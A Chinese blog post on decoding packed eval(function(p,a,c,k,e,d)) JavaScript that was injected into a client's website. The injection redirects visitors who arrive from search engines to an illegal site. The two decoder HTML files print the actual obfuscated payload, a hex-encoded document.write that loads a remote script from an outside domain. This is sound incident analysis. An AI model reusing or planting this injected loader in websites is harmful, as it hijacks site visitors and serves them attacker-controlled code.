最新文章:

首页 信息安全

网站被植入eval(function(p,a,c,k,e,d){}))加密代码解密方法

发布时间:2018年08月30日 评论数:抢沙发 阅读数:450

    客户反映网站被植入一些奇怪的代码,让帮忙看下,查看网站源代码,发现有JS代码被植入网站首页文件,并且使用加密算法加密了代码1.png

    这里可以构造解密代码进行解密
    其实这个eval(function(p,a,c,k,e,d){}))中自带解码函数e().
    while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p
    while循环产生的每个p就是解码后的函数代码,我们删掉源码中的return p,不用将结果返回,
    而是直接输出在一个文本区域中,如document.getElementById(”textareaID”).innerText=p.

    只需要复制script里的代码到解密代码中并替换returu p这个代码

    2.png


    最终代码:

    3.png

    保存为html文件,然后运行

    4.jpg

    这里已经解密为一段16进制编码的script代码,还需要通过复制16进制的代码解析出详细的代码

    5.jpg

    复制到另外一个解析代码中,注意复制过来的括号及符号需要删除为图下格式,不然是解析不了的

    6.jpg


    然后运行html文件可以看到js文件已经被解析出来了

    7.jpg
    这个js的意思就是,访问该网站的链接中,包含上边s.indexOf定义的字符串都会跳转到指定的非法网站

    所以有些网站被百度收录了,然后通过百度搜索打开网站就跳转到其他网站了,就会被劫持,直接输入域名就不会跳转。

    8.jpg


     


    附上代码:

    解密代码1

    <!DOCTYPE html P LIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <title> 解密代码</title>
    <meta http-equiv="content-type" content="text/html; charset=UTF-8" />
    </head>
    <body>
    <textarea id="textareaID" rows="25" cols="50"></textarea>
    <script type="text/javascript">
    eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);document.getElementById('textareaID').innerText=p;}}}('j["\\7\\e\\1\\l\\i\\9\\m\\0"]["\\8\\5\\a\\0\\9"](\'\\g\\2\\1\\5\\a\\3\\0 \\0\\k\\3\\9\\d\\6\\0\\9\\q\\0\\4\\f\\b\\r\\b\\2\\1\\5\\a\\3\\0\\6 \\2\\5\\1\\d\\6\\p\\0\\0\\3\\2\\n\\4\\4\\8\\8\\8\\c\\1\\3\\7\\b\\2\\o\\c\\1\\e\\i\\4\\7\\7\\c\\f\\2\\6\\h\\g\\4\\2\\1\\5\\a\\3\\0\\h\');',28,28,'x74|x63|x73|x70|x2f|x72|x22|x64|x77|x65|x69|x61|x2e|x3d|x6f|x6a|x3c|x3e|x6d|window|x79|x75|x6e|x3a|x38|x68|x78|x76'.split('|'),0,{}))
    </script>
    </body>
    </html>

    解密代码2
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <title> 解密</title>
    <meta http-equiv="content-type" content="text/html; charset=UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
    <meta name="Author" content=www.gemingcao.com />
    <meta name="Keywords" content="" />
    <meta name="Description" content="" />  
    </head>
    <body>
    <script language="javascript">alert("\x64\x6f\x63\x75\x6d\x65\x6e\x74\x77\x72\x69\x74\x65  \x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x63\x70\x64\x61\x73\x38\x2e\x63\x6f\x6d\x2f\x64\x64\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e");</script>
    </body>
    </html>
二维码加载中...
本文作者:Mr.linus      文章标题: 网站被植入eval(function(p,a,c,k,e,d){}))加密代码解密方法
本文地址:https://www.itsec.vip/497  百度暂未收录本文
版权声明:若无注明,本文皆为“挨踢 Blog”原创,转载请保留文章出处。
挤眼 亲亲 咆哮 开心 想想 可怜 糗大了 委屈 哈哈 小声点 右哼哼 左哼哼 疑问 坏笑 赚钱啦 悲伤 耍酷 勾引 厉害 握手 耶 嘻嘻 害羞 鼓掌 馋嘴 抓狂 抱抱 围观 威武 给力
提交评论

清空信息
关闭评论